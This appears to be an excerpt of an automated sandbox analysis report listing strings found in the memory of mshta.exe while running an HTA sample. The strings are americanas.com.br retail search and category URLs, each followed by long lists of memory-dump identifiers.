Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/guirlanda-de-nataln4oP
Source: mshta.exe, 00000000.00000003.25462631431.0000000009447000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443295751.00000000093E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477835168.000000000AC0E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25413137079.000000000C0F1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411110659.000000000AADA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25441872496.000000000C0F2000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377966306.000000000AB45000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000677A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25413034610.000000000C0F0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/panetone
Source: mshta.exe, 00000000.00000003.25402097354.000000000AC33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000677A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488311593.000000000AC36000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401903465.000000000AC27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25441922938.0000000009921000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401838854.000000000AC13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387100895.000000000302B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/panetone-bauducco
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/panetone-bauducco/c
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401457586.00000000094A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/presepio-de-natalo
Source: mshta.exe, 00000000.00000003.25386040349.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487965242.000000000ABDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404712599.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.00000000094A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000677A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400942493.000000000ABDD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25441922938.0000000009921000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.00000000094A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/busca/whisky-royal-salute
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460571625.0000000009578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402424995.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459239751.000000000946A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387679114.000000000ABC0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25466141832.000000000ABC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/agro-industria-e-comercio?chave=pfm_home_agro_menu
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458620748.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403823205.000000000B654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25426074668.0000000009C1B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25462978019.000000000B696000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460847777.000000000B657000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422689063.0000000009C1A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377202169.000000000B654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25489928071.000000000B699000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443682382.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.000000000955E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores/aquecedores-de-ar?chave=pfm_hm
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402274224.000000000ABFB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410331977.000000000ABFC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402044364.000000000ABF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25488051820.000000000ABFC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000ABE6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000ABCE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=dk_hm_at_clima
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=dk_hm_at_clima3
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444845667.0000000009564000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25426074668.0000000009C1B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25422689063.0000000009C1A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377202169.000000000B654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318069432.000000000676A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443682382.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438311238.0000000009C1C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.000000000955F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=pfm_hm_tt_1_0_ar-condici
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.000000000946E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=pfm_home_ar_menu
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402044364.000000000ABF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397841078.000000000B73B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25490436836.000000000B73C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405052073.000000000B734000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/artesanato?chave=pfm_home_artesanato_menu
Source: mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/artesanato?chave=pfm_home_artesanato_menuM
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A953000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404984172.000000000A955000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402472105.000000000A954000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25486183528.000000000A957000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318505986.000000000BDEE000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/artigos-de-festas?chave=pfm_home_festas_menu
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317891511.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392143865.000000000A972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318229507.000000000679B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25318413580.00000000067A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458566580.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458855174.0000000006F14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387156704.0000000009469000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397933321.0000000006EC2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006E97000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398326236.0000000006F14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397343224.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387237679.000000000AC4A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006EF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403434218.0000000006ECD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478014141.0000000006F14000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000AC4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/audio?chave=pfm_home_audio_menu
Source: mshta.exe, 00000000.00000003.25402097354.000000000AC33000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383700341.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404755230.000000000AB34000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378136388.000000000ABD8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377708580.000000000AB13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376437746.000000000ABB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25380726900.000000000ABDC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25405052073.000000000B734000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400780155.000000000ABE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25401903465.000000000AC27000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/automotivo?chave=dk_hm_at_automotivo
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.0000000009478000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386864327.0000000009475000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/automotivo?chave=dk_hm_at_automotivo.
